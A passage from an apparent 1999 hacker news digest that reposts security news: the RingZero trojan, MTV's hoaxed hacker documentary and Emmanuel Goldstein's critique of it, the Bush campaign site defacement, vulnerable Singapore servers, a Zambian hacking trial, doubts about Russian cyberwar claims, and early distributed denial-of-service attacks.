technology," said SANS security researcher John Green. "The proxy is being used to send its own IP address and proxy port home to the mothership." But SANS researchers think RingZero has other abilities too. They found the Trojan has a second part, called its.exe, that tries to retrieve files directly from Web-servers. Both parts seem able to work independently of each other. The researchers are currently trying to determine what the file-retrieving component does with its booty. SANS is asking network administrators to check their systems for files called pst.exe and its.exe. It also wants to hear from any administrator who sees outgoing network traffic on port 8080 and 3128. Seeing such traffic on a network that doesn't have a proxy server is a strong sign that they have been infected by the RingZero. @HWA 25.0 MTV Called Inexcusable By ITC ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Space Rogue The Independent Television Commission (ITC) has labelled the recent MTV show on Hackers as inexcusable. The show attempted to portray what hackers and hacking is all about. Instead MTV was taken for a ride by one of the people they profiled and MTV failed to verify any of the 'facts' presented to them. The end result being that the underground community was portrayed as a bunch of criminals with no redeemable qualities. ZD Net http://www.zdnet.co.uk/news/1999/41/ns-10798.html Emmanuel Goldstein and the staff of 2600 spent a large amount of energy with the MTV crew when it was thought that MTV wanted to do a story on Kevin Mitnick. As it turns out MTV evidently did not have enough time and cut out all references to Mitnick. Emmanuel Goldstein's Comments http://www.hackernews.com/orig/emmanuel.html Shamrock's Statement http://www.hackernews.com/orig/shamrock.html (See elsewhere this issue) HNN Reader Comments http://www.hackernews.com/orig/mtv.html MTV's True Life: I'm a Hacker http://www.mtv.com/mtv/tubescan/truelife/ ZDNet; MTV made to look ridiculous by fake hacker Tue, 19 Oct 1999 17:31:17 GMT Will Knight TV channel's blinkered view of hackers enabled programme hoax America's premier music television channel, MTV has been duped by a hoaxer in its much-maligned "True Life: I'm a Hacker" programme. After the show was screened in the US, the main character in the show, Shamrock, issued a statement revealing that he made the whole thing up. Shamrock, who last week gave an in-depth interview with MTV explaining the motivation behind his hacking exploits, on Monday said the show was total nonsense and was designed to illustrate how gullible MTV was. In the statement, published on the Hacking News Network Shamrock explained it was MTV's cynical approach to hacking that prompted his scam. "We waited for months to see if they would be realistic and after it was obvious that they wouldn't, we figured the only option would be to discredit them with as much fiction as possible." Shamrock adds that he and fellow hoaxers never expected MTV to swallow the absurdities they made up and argued the hoax illustrated the shallow nature of the mainstream media. "We had no intention of making hackers look bad. All I can do is reiterate to you just how fake and hollow what you see on television is. After this experience I wonder where if any truth lies in what we are told to watch. This is the obvious issue the hacker community needs to address." Practising British hacker Harlequin, famed for defacing international Websites, told ZDNet News the media is often guilty of misunderstanding and misrepresenting hackers. He said: "Hacking and computer technology are very complex areas, both technically and socially. Naivety can easily be exploited as well as accuracy." A representative from the Independent Television Commission (ITC), the British television industry's independent watchdog, said that it considers this kind of blunder inexcusable. "This sort of thing is not difficult to detect if you've done your work properly. We would expect program makers to do their work and to make things that are factually accurate." Despite several attempts, ZDNet was unable to reach an MTV spokesperson. Goldstein's comments; Submited By: Emmanuel Goldstein I haven't had time to even begin to deal with this until now. So I'll be as clear as possible. Our fears of what this show would be simply did not do it justice. The reality was so much worse than any of the warnings we started getting months ago. And the most troubling part of all this is that so many people involved in this really knew better yet sensationalism was allowed to run unchecked. A little history to begin with. We at 2600 were approached by MTV back in 1998 when they expressed an interest in doing a hacker documentary, with the Mitnick case being a focal point. For months after, we helped hook them up with various people and spent a considerable amount of time working with them and helping them however we could. The first warnings of trouble came from an MTV intern who called into "Off The Hook" on June 29 with the revelation that all references to Mitnick had been eliminated and that the "documentary" was now going to focus exclusively on three trendy teens instead of the people and issues that were originally said to be the focus. Even with this disturbing news, we told people to not pass judgement until the thing had aired. Well, it's aired and now it's judgement day. Right away, the show begins with such sensationalism and quotes meant to scare the shit out of Joe America that I swear I could *smell* Geraldo. "It's like being God." "If I had the opportunity to shut off all the power in the city, would I do it?" "We want to know the location of every squad car within the nearest vicinity [sic]." And finally, "What people don't understand, they fear." Well, that's sure the theme of this half hour, isn't it? MTV clearly didn't grasp what hackers are or maybe they just didn't *want* to since anything that complex might confuse the audience they know so well. And they certainly did their bit to spread fear throughout the program with quotes like the above, with absolutely nothing to show that this was anything other than teenage bravado. Then the part that really pissed me off personally. Earlier this year, I had asked the producers for one little thing in exchange for all the help that I and other 2600 people had given them. President Clinton had given a speech in January on computer hackers. We couldn't get the White House to give us a video copy which we would have loved to use in our upcoming documentary. I asked them if they could pull some strings and they said they'd look into it. Last I heard they were having no success. And guess what footage managed to show up in this program? That's right, the footage they didn't even KNOW about which they obtained after all and kept for themselves without a word to any of us! Fortunately there are other networks who *do* live up to their promises and we've gotten the footage from them. But this shows the sleaze factor at work in this kind of a production. "Never before have people so young had so much potential power to disrupt the systems we all rely on." Please. Here we have the MTV age fixation coupled with a blatant bit of hysteria with no factual basis to back it up. Better get used to it as virtually none of the "facts" presented in the next half hour will be researched or confirmed in any way. "Chameleon faced off with one of America's most dangerous enemies." This is basically Chameleon getting a piece of mail from someone he doesn't know who lives overseas - at least that's all the details we're going to get here. "Shamrock - role model or renegade?" Yeah, that's the question that's been plaguing the hacker world for years. "Mantis - who says he can find out anything he wants about you." Just by making such a claim, MTV will skip over all the proof and do a feature on you as if everything you claim is true. Not one iota of evidence is ever presented to back up this absurd bragging. Now I want to point out that I don't personally have anything against any of the people who were portrayed in this program. They were basically taken in by MTV and taken advantage of. But by the same token, I don't think these people have a whole lot to do with the hacker community - at least, not from what we could see here. Almost every sentence uttered throughout this program was a mistruth of one sort or another. Mantis: "People see hackers as some fat kid sitting at home dressed in black... I don't fit the stereotype of a hacker." Well, guess what? You *do* fit the stereotype - MTV's stereotype or else why would they have ignored all of the other people who are part of the hacker world who don't fit into the MTV demographic? It's hard to figure out who was playing who more - these kids or the MTV marketers. Narrator: "At 16, Chameleon left high school and became a superstar of the hacking underground." Yeah, we have superstars in the hacker world just like in the music business - how convenient for MTV. In fact, we don't really care at all about the technology - it's all about personalities. (That was sarcasm in case any MTV people are getting hard reading that.) They seem really happy turning the whole thing into an episode of COPS while Shamrock and friends walk in slow motion down city streets with blurred faces. They can't get enough of his involvement with drug dealing, as if that has got anything to do with anything. They call him an expert on "phone phreaking" and once again don't back it up in any way. Apparently just walking down a street saying "I have knowledge that many people don't" is enough for MTV to believe you. "Not much is legal about hacking but it's never been easier to do." I'd love to see MTV's definition of hacking. From this show it would appear to be: affiliating with terrorists, taking over the military, moving satellites, and dealing drugs. Serena is once again amazed that Mantis has a copy of "The Matrix" on his computer. Apparently, she's never had the opportunity to download a file. That's really all there is to it, you know. It's pretty fucking simple and, once again, has got absolutely nothing to do with hacking. But you have to love the mixed up hacker logic that is used to defend copying a movie: "It's all about trading information. Information has to be free. If Big Brother is watching me, why can't he be watched also?" Hello?? The MATRIX?! Copying a pirated movie is somehow striking out at Big Brother? What an insult to the many truly deserving causes that are out there and were passed over for this tripe. The only part of the program with any glimour of what hacking is about is the section on the L0pht. But they never even bother to get into it, spending less than a minute on the entire group/concept and using the majority of *that* time to portray them as people whose most important ability would be disrupting the entire Internet. Next, Serena follows Shamrock as he attempts to get to an imprisoned friend's disk before the authorities do. (Didn't we see this plot device in "Hackers"?) Of course we never see the disk, don't get any details about the friend, and learn absolutely nothing about anything in the whole fiasco. But we do get to hear this bizarre exchange: - Serena: "What do you think you can find on this disk?" - Shamrock: "The police! You know, when we're listening to them on the radio, obviously they're transmitting on a radio frequency - we know what frequency they're transmitting on cuz we're receiving it." Maybe a good dose of LSD is the only thing that'll make sense out of that. "You never know what you're dealing with when it comes to hacking" is one of the insightful concluding thoughts. You also never know what you're dealing with when you don't do any research into the subject matter or check out your sources. I'm hearing now that Shamrock is claiming he made the whole thing up just to fuck with them. If that's true, MTV certainly got what they deserved by ignoring the advice and warnings of knowledgeable people in order to pursue an utterly fictitious story. But while Shamrock may have thought it was amusing, it was stupid and caused great harm to the community by making people believe this kind of crap. I can only assume that he thought they would actually check the facts before running with the story. Now we all know better. As for Chameleon, all kinds of allegations are thrown around about his dealing with a terrorist. Yet the only "evidence" of this comes from the editor of AntiOnline, who does not exactly have a good reputation when it comes to presenting facts accurately. (MTV hired him as their technology consultant - another detail they kept quiet.) There is absolutely NO EVIDENCE from a credible source that this foreign person he got a check from had anything to do with any terrorist group. All it shows is that someone was monumentally stupid in thinking that paying to hack a web page was a good idea. Again, nothing to do with hacking. Again, the facts were never checked. Mantis: "I've been to the end of the Internet and back - over the course of my years, I've done everything possible." This kid is 19. With a boast like that, I expect him to have found the meaning of life by the time he's 30. I say we hold him to it. What's amazing (and indicative of the MTV sleaze once more) is that Mantis isn't shown to be doing anything illegal. In fact, he's the success story, teaching others, staying out of trouble, doing positive things... Yet MTV manages to make him look like a criminal by getting him to say that *IF* he did something illegal he would know how to cover himself. Slick. The whole charade ends with footage of Serena not able to get into her AOL account and saying "my account has been hacked by hackers." She feels "angry and violated." There is irony here - most everyone in the hacker world has the same feeling right now because of MTV's yellow journalism. But once again, there is no evidence to suggest that this "hack" is anything more than a publicity stunt, much like when MTV hacked its own web page a while back to get attention. If there is anything to suggest that Serena herself didn't do this or one of her fellow employees didn't set it up to get the "perfect ending," I sure didn't see it. Changing a password on AOL is not exactly hacking. But since nothing else in this half hour was either, we can hardly be surprised. So the lessons to be learned here are several. The most important being: DON'T TRUST THE MEDIA! Especially the slick and trendy media. They're not interested in the story but rather in being cool and accepted in the industry. If you don't know how to deal with them, they will screw you over and as a result screw over those people you're supposedly speaking on behalf of. Far too many people were getting all excited about MTV doing a piece on Mitnick that they played right into their hands and got crucified. While Kevin was justifiably upset that they cut him out of the program (they claim they just didn't have enough time), I think he'll be happy not to have any affiliation at all with this portrayal. Interestingly, special thanks are given to David Schindler (Kevin's prosecutor) which means that they actually managed to do a rare video interview with him and still decided to shelve it or maybe he gave them a ton of money to just sit on the story. At this point, I'll believe anything. emmanuel @HWA 26.0 Bush Web Site Defaced ~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by punkis The web site of presidential candidate George W Bush was defaced yesterday and filled with Marxist propaganda. Evidently in the rush to switch over from Unix to NT the administrators forgot to remove the sample .asp files. Associated Press - via Yahoo http://dailynews.yahoo.com/h/ap/19991019/tc/bush_hacked_3.html Wired http://www.wired.com/news/politics/0,1283,31986,00.html Attrition.org - Screen Shot of Defacement http://www.attrition.org/mirror/attrition/1999/10/19/www.georgewbush.com/screenshot.jpg Georgewbush.com http://www.georgewbush.com/ AP; Tuesday October 19 8:27 PM ET Hackers Alter Bush Campaign Site By TED BRIDIS Associated Press Writer WASHINGTON (AP) - Hackers vandalized the campaign Web site for presidential candidate George W. Bush early Tuesday, briefly replacing his photo with an image of a hammer and sickle and calling for ``a new October revolution.'' The embarrassing lapse in computer security came the day after the Bush campaign launched what it described as its ``innovative new design'' for its Internet site, www.georgewbush.com. ``We have taken steps to make sure this particular problem is fixed, and we are looking at other ways to further secure the site,'' spokeswoman Mindy Tucker said. The campaign was considering whether to formally notify the authorities, such as the FBI, she said. Tucker said the campaign's more sensitive computer operations - such as its e-mail system and contribution records - were protected on other machines and weren't believed to have been compromised. The hackers replaced a news story about Bush on the Web site with a note that ``the success or failure of the working class to achieve victory depends upon a revolution (of) leadership.'' The Web site runs software from Microsoft Corp (Nasdaq:MSFT - news)., called Internet Information Server, that has suffered several serious security problems during the past year. Microsoft has distributed patches in each case but relies on local computer administrators to install them correctly. A review of the Bush Internet site by The Associated Press showed computer files plainly visible that experts recommend deleting for security reasons. One file includes instructions for users to edit Web pages on the site. ``It means to me there is no security policy for this site,'' said Russ Cooper, a specialist who runs the popular NTBugtraq discussion group on the Internet to expose security problems. ``It's typically unfortunate that a lot of these people do not take the time to protect themselves from this kind of embarrassment.'' Another expert, Weld Pond, said there was ``no question'' that the Bush campaign neglected to remove these remnants of computer code, which made the site vulnerable. ``That's probably how they got in,'' said Pond, a consultant with L0pht Heavy Industries of Boston. ``The fact that there are these sample files on there is pretty problematic, meaning they didn't take much effort to secure it.'' Tucker said the campaign's own investigation found that the altered Web page was accessible by the public for fewer than five minutes before a backup system kicked in and restored the vandalized text with a fresh copy. ``The image wasn't subtle,'' said Jeremy Pinnix, a director at a Nashville, Tenn., design company who captured a snapshot of the vandalized Web site. He said he notified the Bush campaign immediately, but ``they didn't really seem too worried.'' Before Vice President Al Gore's campaign acquired the Web address for its Internet site, www.algore2000.com, a spokesman said the previous owner published a blurred photo of Gore with the message: ``Should Al Gore be president? It's a little unclear (get it?)''  Wired; George W. Bush the Red? by Declan McCullagh 12:55 p.m. 19.Oct.99.PDT Intruders apparently defaced the official campaign site of Republican presidential candidate George W. Bush early Tuesday, replacing a photo of the Texas governor with a bright red hammer and sickle. Visitors said the modified Web site, which quoted socialist literature and linked to the International Communist League, was visible around 9:15 a.m. EDT. Campaign officials spent the morning trying to puzzle out exactly what happened, a task made more difficult by the fact that the Web server automatically copied over the hacked page with the original one. "We're trying to find out whether we had a visitor. Indications are that we had a visitor," said Greg Sedberry, georgewbush.com webmaster. This isn't the first time a presidential contender has been embarrassed. Vice President Al Gore's campaign site was hacked on 10 April. "Gore was broken into in April. That's the only one I know of in the 2000 race," said B.K. DeLong, curator of the defacement archive at attrition.org. On Monday, the campaign introduced a newly designed Web site, switching from a single Unix server to multiple computers running Windows NT and Microsoft's Web server. "I inherited that Unix box when I came on board [in July]," Sedberry said. "I took that box and said we need a more robust setup. It was developed from scratch, and that's where the problems can arise." The campaign's NT machines are co-located at Austin-based Illuminati Online, which says it hosts 2,000 customer Web sites. "The George W. Bush machines are not under our control. They maintain everything on those machines," said an Illuminati Online engineer. Jeremy Pinnix, webmaster of Nashville-based Anderson Thomas Design, said he noticed the hacked site early Tuesday. "I called them [the campaign] right away. They asked me to do a screen capture and to email it to them. I haven't heard back, but when I refreshed, it had been fixed," he said. "Our first battle plan is to figure out exactly what happened," said campaign spokeswoman Mindy Tucker. "This is obviously a problem that anyone who has a Web site faces." Sedberry said the NT machines are load-balanced, and the master Web server copies files every few minutes to the duplicate ones. "We're going through the whole system saying, 'Are we sure we locked that down?'" said campaign webmaster Sedberry. "We're finishing it up, double-checking, triple-checking. And we'll see." According to a screen snapshot, the hacked site quoted the International Communist League's belief that "we must take the Marxist doctrine of proletarian revolution out of the realm of theory and give it reality." @HWA 27.0 Space Rogue, Editor of HNN, on ABC News Webcast Today ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by weld pond Space Rogue from HNN will be interviewed today in a live webcast with Sam Donaldson. The subject is "Who hacks computers, and why?". Also appearing will be William Marlow, executive vice president of Global Integrity, a company that advises other companies on hackers/crackers. Sam Donaldson Live! - The show will be archived for later viewing http://www.abcnews.go.com/onair/DailyNews/SamDonaldson_Index.html @HWA 28.0 20% of Hosts in Singapore Vulnerable ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by lamer When the local Singaporean newspaper, The Sunday Times, asked IT security firm Infinitum to check on the vulnerability of local systems they found that fully one fifth of .sg address where vulnerable to attack. Infinitum's found 13,000 registered .sg addresses with almost 8,000 actually connected to the net. The scan revealed that of those 8,000 sites 1,833 were running with outdated or unpatched software leaving them vulnerable to cyber attack. The Straits Times http://web3.asia1.com.sg/archive/st/0/cyb/cyb1_1017.html OCT 17 1999 Many servers easy prey to hackers A check by an IT security firm reveals nearly 25 per cent of servers with .sg addresses are using flawed software with holes hackers can exploit easily By SAMANTHA SANTA MARIA MORE than a fifth of nearly 8,000 operational Internet servers here are using flawed software that would allow hackers to enter in under a minute. The 1,833 servers hosting websites which have .sg in their addresses are either using old software riddled with holes hackers can exploit, or newer software in which the holes have not been "patched" with security-enhancing updates. This is against a backdrop of 70 per cent of the servers here using one program or another which is known to have security flaws. This is what local IT security firm Infinitum found in a check done for The Sunday Times. The servers include those which host the websites of government departments, Internet service providers and educational institutions. Security consultants said that it is alarming that more than a fifth of Singapore's Internet servers are insecure. The situation suggests that the people running these systems do not know about the security lapses or do not know how to fix them. They noted that users find faults in Internet server software all the time and the software vendors come up with remedies, or "patches". But there is cause to worry if people looking after computer systems here are not spotting the flaws and patching them up as and when they are found. Mr Tom Cervenka, a US-based network penetrator whose job is to test security, said most intrusion attempts could be thwarted by site managers who pay attention to security issues and update the protection for their sites regularly. He said: "The problem seems to be a shortage of administrators who do this." The problem is not exclusive to Singapore, said the consultants. Security awareness is generally low worldwide. A spokesman for an Israeli IT firm, Voltaire, said: "Systems administrators don't seem to have a firm grasp on security issues, no matter where they are." The Sunday Times asked Infinitum to run the check after local websites were defaced, and several hackers cited the lack of security in Singapore websites as a reason for why they are targetted. Infinitum's check showed that there are almost 13,000 websites whose domain name ends with .sg, and of these, close to 8,000 are operational. It used an easily available program to poll the .sg servers on what software was being used to publish their web pages. The company then assessed the security of the software based on known vulnerabilities in the server software. It found about 40 per cent of the servers use a freely distributed program by a non-profit organisation called Apache. A Sunday Times check shows that the National University of Singapore, the Internal Revenue Authority of Singapore and Sony Music's local office are among them. The second most popular software is Microsoft's Internet Information Server. This is used by almost 30 per cent of the servers here. It is understood that the Singapore Management University, People's Association and Harry's Bar are also among the software's users. @HWA 29.0 Zambia's First Computer Crime Trial ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond The Lusaka, Zambia government's State House web site was altered on July 7, 1999 and the intrusion was not noticed until 10 days later. Patrick Mkandawire has charged and arrested for violating the country's Telecommunications Act. His lawyer has argued that that law does not apply to his clients crimes. The court has yet to make its final ruling in this case. Africa News http://library.northernlight.com/FD19991018120000062.html?cb=0&dx=1006&sc=0#doc Story Filed: Monday, October 18, 1999 8:12 PM EST LUSAKA (Zambia) (African Eye News Service, October 17, 1999) - Zambia's first computer hacker appeared in a packed Lusaka courtroom this week after he allegedly cracked the government's State House website and replaced President Frederick Chiluba's photo with an unflattering cartoon, African Eye News Service (South Africa) reports. Internet data processing manager Patrick Mkandawire allegedly hacked into the government internet site on July 7 but it took officials ten full days, until July 17, to notice he had replaced Chiluba's official portrait with the "insulting" cartoon. Mkandawire's attorney, Clement Michello, did not deny that his client had hacked the site but insisted that Zambia did not yet have the laws to prosecute anyone for computer hacking. "The country simply doesn't have laws regulating mischief on the internet and my client has therefore been irregularly charged," he said. Mkandawire was charged and arrested for violating the country's Telecommunications Act, which only regulated the activities the state-owned Zambia Telecommunications Company Limited (ZAMTEL). It makes no direct reference to the Internet or websites. Michello conceded that computer hacking was covered by the draft 1998 Law Development Computer Bill but he stressed that the Bill was still being finalised by the country's Law Development Commission and had not yet even been tabled for debate in Parliament. "How can anyone be charged under a no-existent law? This Bill will only have authority once it has been approved and enacted," he said. The draft Bill provides for the registration of computers and prohibits unauthorised access, alterations or modification of data stored on computers. Warning that any attempt to prosecute Mkandawire using the Bill would be unconstitutional, Michello demanded that all charges against Mkandawire be quashed. "My client should be released immediately," he said. Prosecutor John Katongo rejected Mkandawire's defence, insisting that the Telecommunications Act provided for the establishment of a Communications Authority which was in turn responsible for licensing Internet Service Providers (ISP). The government website, and Chiluba's portrait, was hosted on one of these service providers, Zamnet, and were therefore subject to the law, he said. "Mkandawire has been charged for interfering in the telecommunications service provided by Zamnet and we are therefore fully within our rights to demand that he be punished," said Katongo. The court will rule on Michello's objections to the charges next Monday. Online. Copyright © 1999 African Eye News Service. Distributed via Africa News @HWA 30.0 Russian Infowar Debunked ~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Omega Is Russia on the verge of cyber attack as people in the FBI and the US Military would have you believe? Or is this more saber rattling to secure funding for their anti-cyber terrorism efforts? (Definitely a good read. Makes you think twice about those comments from Michael Vatis and Gen. Hamre.) PBS http://www.pbs.org/cringely/pulpit/pulpit19991014.html I'm From the Government, Trust Me Why Russia Probably Isn't Invading U.S. Government web Sites and Even if They are, It Doesn't Matter By Robert X. Cringely Twenty years ago, I was working as an investigator for the Presidential Commission on the Accident at Three Mile Island. I was trying to help piece together what caused that nuclear power plant to almost go kablooey. The commission chairman was John Kemeny, inventor of the Basic programming language and then president of Dartmouth College. Back then, as now, nuclear safety was a hot news item, and the Commission was suffering from a news leak. So they called in the security consultants -- men in white belts and white shoes who seemed to be always chomping on unlit cigars. The consultants installed an elaborate system of monitors and guards meant to keep our secrets secret. When asked exactly who they were trying to keep from breaking-in to the building, the chief white shoe said, "Why the Washington Post, of course." The Post, which had been breaking all those TMI stories, never had a budget for burglary. They never needed one. In the case of Three Mile Island, all it took was picking up a few bar tabs at some corner dive. But you could never convince the security consultants of this, since it would mean that their jobs couldn't be justified. And that's the moral of this story: Always consider the personal interests of people who say we are in danger and should pay them to do something to protect us. What brought all of this back to mind after two decades was reading a number of news stories about supposed Russian infiltration of web sites in the U.S. government. To read these stories, it sounds pretty dire, like we are enduring a Russian cyber invasion. Those complaining seem to be the U.S military and the FBI. What a load of hogwash! Read the stories. What secrets have been lost? Well, none, but there has been lots of "sensitive data" transferred overseas. Sensitive data? What the heck does that mean? It means someone wants us to pay for something that doesn't require doing. First let's deal with the difference between secrets and non-secrets. The U.S. government is absolutely mad for secrecy. It has hundreds of levels and types of secrecy, and has a tendency to declare as secret almost anything it considers to have value. Most U.S. secrets aren't worthy of being called secrets, yet they are. Is any of this "sensitive data" secret? Is it classified information? No. So the U.S. government has already decided that it doesn't really matter who reads this stuff. So why should we care, then, if some of the readers are from Russia? U.S. rules say that if something is classified as secret, it can't be held on a computer that is reachable over the Internet. So what we have lost apparently has little value, okay, but maybe what so worries our spooks is the volume of attacks from Russia or wherever. If that's the case, let's consider for a moment how search engines work. Excite, Alta Vista, Hotbot, Google, and all the rest use spider programs that go around the net, find web content, and drag it back to be indexed. All of these search engines -- dozens of them -- claim to be scouring the Internet on a daily basis. This means that they access every web server in Russia many times per day. Hey, doesn't that sound like an attack? Is Excite invading Russia? It also means they access every web server in the U.S. many times per day, including all the web servers holding that so-called "sensitive data." Is Alta Vista attacking U.S. security? So maybe the Russian Academy of Sciences is developing a search engine. Do we have any idea whether it is accessing U.S. web sites that contain other than sensitive data? We don't know anything, because it is not in the interest of these alarmists to share with us that knowledge. We make information available on the Internet -- a global network -- then raise an alarm when that information is actually accessed. What is wrong with this picture? Of course, it is okay for us to do it, we are the good guys, remember? The CIA and the NSA visit every site they can on every server in every country including those we consider friendly. Is the CIA invading Australia? Regularly. Somebody in the FBI or the U.S. military (or both) wants either to expand the definition of what is an official secret to include the hot lunch menu at your local elementary school, or they want more money for expanding their anti-cyber terrorism efforts. That is why these stories appear, not because there is any actual threat. This has to do with regulations or appropriations, but it doesn't have to do with real security. Information that is declared to be for public consumption ought to be for public consumption anywhere. From a data security standpoint, such accesses are actually very good. They show us what is of interest to those we are afraid might become our enemies. And if those enemies actually DO find a nugget of real information in all that HTML, then they will have helped us make our systems better the next time. If there is a real data security story worth paying attention to, it's the IPv6 debate over whether every Internet packet should indicate the very PC upon which it originated. This is another weird situation where privacy proponents are up against those who advocate the protection of intellectual property. But I think the real situation is far different. Some of it is institutional paranoia, sure. But some of it is just busywork: The Internet Engineering Task Force decided 128 bits were needed for future Internet addresses, and they just couldn't bring themselves to allow any of those bits to go unused. We won't actually need 128 bits for decades, maybe centuries, but the idea of allowing some of them to just stay set at zero rankles engineers. So just for the heck of it, they decided to use 64 of those bits to designate the data source right down to the NIC address. Is it stupid? Yes? Should it worry us? No. Our workaround to this point for the limitations of IP addressing has been to invent a variety of proxy and masquerading systems to allow a bunch of folks on a local area network to share a single IP address -- even if that address is dynamically assigned by a DHCP server at Earthlink. The same thing will happen with IPv6, though in reverse. Somebody will start a business to make all those individual IP addresses look like a single address. Problem solved. And you can bet it WON'T be solved by anyone with matching white belt and shoes. @HWA 31.0 Distributed Coordinated Attacks ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by AlienPlague A new style of DOS attacks, dubbed 'distributed coordinated attacks' may be the future of denial of service attacks. The new attack style, which has been seen a 'handful' of times over the past few weeks, are harder to detect and stop, mainly because, as the name implies, the attacks originate from more than one server. ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2376768,00.html?chkpt=hpqsnewstest -------------------------------------------------------------- This story was printed from ZDNN, located at http://www.zdnet.com/zdnn. -------------------------------------------------------------- Cyber attacks -- both old and new By Robert Lemos, ZDNN October 19, 1999 3:53 PM PT URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2376768,00.html ARLINGTON, Va. -- Over the past six weeks, U.S. network servers have come under assault by a fundamentally new style of computer attack, said experts here at the National Information Systems Security Conference. Known as "distributed coordinated attacks," this new style is particularly good at defeating present-day defenses against those intent on stopping Internet traffic to a particular company or Internet service -- a result known as denial of service. "It's possible to detect the attack, but it is very hard to block it" using current software, said Thomas Longstaff, senior technical researcher for Software Engineering Institute at Carnegie Mellon University, during a panel presentation Tuesday. A garden-variety denial-of-service attack uses a single server to attempt to tie up a network's connection, denying its users access to or from the Internet. Distributed coordinated attacks, however, use hundreds or thousands of servers co-opted by a malicious programmer to tag-team a single server. Because so many servers are used, each attack can be camouflaged as a legitimate connection attempt, making it difficult for the victim's intrusion software to identify that it is under attack and impossible to identify just who is attacking. "Typically, you block the single network address that is attacking you," said Longstaff, whose group works with the Computer Emergency Response Team Coordination Center at Carnegie Mellon. CERT/CC tracks and responds to network attacks. "By spreading out the attack over a large number of addresses, it becomes much harder to deal with." A 'handful' of attacks Longstaff and others have already locked horns with intruders using the distributed coordinated method of attack. In the past six weeks, a "handful of sites" have been attacked, taking them off the Internet for an unspecified amount of time, he said. He would not give any more details. Getting the access necessary to compromise hundreds of servers is not as difficult as it sounds, said Barbara Fraser, consulting engineer to the CTO at Cisco Systems Inc. With "always on" connections to the home becoming more and more common, the number of insecure computers connected to the Internet full-time is increasing. "With the average home user knowing very little about security, this problem is going to get worse," she stressed. In addition, hackers are more frequently automating the software used to gain access to systems through known exploits. A whole host of programs exist to scan networks connected to the Internet for previously discovered security holes that system administrators have not patched. Attacks 'lowest common denominator' "This method attacks the lowest common denominator in security," said CERT's Longstaff. "It will never be hard to find a thousand servers that don't have the most up-to-date patches." In fact, prevention may rely more on protecting computers from being used by malicious programmers, rather than protecting the target, he said. Stephen Cobb, vice president of research and education for InfoSec Labs Inc., stressed that network attackers, be they hackers or criminals bent on espionage or terrorism, have only temporarily thwarted the security software. "The security arena is a steady progression of more sophisticated attacks followed by better defenses," he said. "There is an evolution at work here." The conference, put on by the National Institute of Standards and Technology, collects the United States' foremost professionals in network security. A glance through the attendee list shows that more than one attendee out of every 10 is an analyst for the computer-focused National Security Agency. @HWA 32.0 Possible Network Intrusion Scenario ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Q Bahl This is a fairly decent article that outlines how an intruder might break into a mixed NT/Unix environment. It covers zone transfers, DMZ models, password sniffing/cracking, nmap, and other well-known tools and techniques. The author actually understands that one must have root before they can install back doors. Network Computing http://www.networkcomputing.com/1021/1021ws1.html Anatomy of a Network Intrusion October 18, 1999 By Greg Shipley Empty Red Bull cans litter the floor, reflecting the warm glow of the monitors. Alongside the sketch boards lie drained liters of Mountain Dew, partially eaten burritos and dozens of 486 machines configured as Linux Beowulf clusters. A Pentium II machine plugged into a seemingly endless line of surge suppressors hums as it continues to brute-force password guesses at a rate of 10 million per second. Only 12 more hours to go... All the machines have their lids off--no hard-core geek is ever satisfied with the state of a system. Legal pads are covered with IP addresses, penciled network maps and port numbers. As the attackers' scripts relentlessly scan for the presence of the recently identified CGI vulnerability, they continue to exchange notes with the crew on IRC (Internet Relay Chat). They figure once they've compromised a few dozen ISPs--creating a network of "stepping stones"--they can forge ahead to their target. It's all about buffer space--a disposable safety net with a redo button. If they "own" a dozen machines between them and their target, they can attack with the confidence that only a cyborg in a time machine could ever gather enough info to snag them--only a handful of organizations have the manpower or expertise to catch intruders who leave no trail. Attack, clean, reattack--and gain as much net space as possible. Auditor? Cracker? Strung-out administrator? The roles can be interchanged and the distinction blurred, with one exception: The crackers have the easiest task. They need find only one open doorway; the defenders must check every lock. "It takes one to know one" may be cliché, but it holds up in the network security arena. Understanding how attackers operate is invaluable--in fact, it's your best defense. The concept of "hacking" into your own network for security purposes isn't new. Dan Farmer published a paper in 1995 entitled "Securing Your Site by Breaking Into It" (www.fish.com/security/admin-guide-to-cracking.html). Network Computing published a similar article a few years ago (see "Intrusion Detection Provides a Pound of Prevention" at www.networkcomputing.com/815/815ws1.html). Many of the time-tested security principles still hold true. However, attackers' tools and talent have taken giant leaps. Each time security products mature, so do attack methodologies, and if you fall behind on either, you're setting yourself up for a nightmare. Cracking Some Myths Before we even think about sitting down in front of a computer, let's debunk some common assumptions about crackers and excuses for reduced vigilance. "We are not a high-profile company--no one is targeting us." You may manufacture industrial-strength toilet seats, but be "next door," in Internet terms, to an e-commerce site performing credit-card processing. Or maybe you have great bandwidth or juicy servers, or maybe your domain name just sounds cool. It often doesn't matter what your company is or does, intruders can make use of your network even if it isn't their final target. "That is a really complicated attack--it would never happen to us." Although experts agree that the successful cracker lies somewhere between script kiddy (able to execute prewritten code, but unable to manufacture new exploit code) and elite programmer, most are able to pull off fairly sophisticated attacks. Think back to your college years. Imagine spending less time drinking beer and more time in front of your terminal. What level of mischief could you achieve? Now add the declining prices of bandwidth and hardware and it's no wonder 14-year-olds are drawing visits from the Secret Service. @HWA 33.0 Intrusion Detection Provides A Pound Of Prevention ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ By Mark Abene, Gerald L. Kovacich and Steven Lutz Attacks on systems and networks have skyrocketed as rapidly changing technology, systems integration, global networks, information warfare and hacker boredom have become prevalent. Is your network next? Have you been hit already? In the past, teams of friendly attackers, known as "Tiger Teams," would test the security of systems and networks. Today, teams like this and friendly attacks 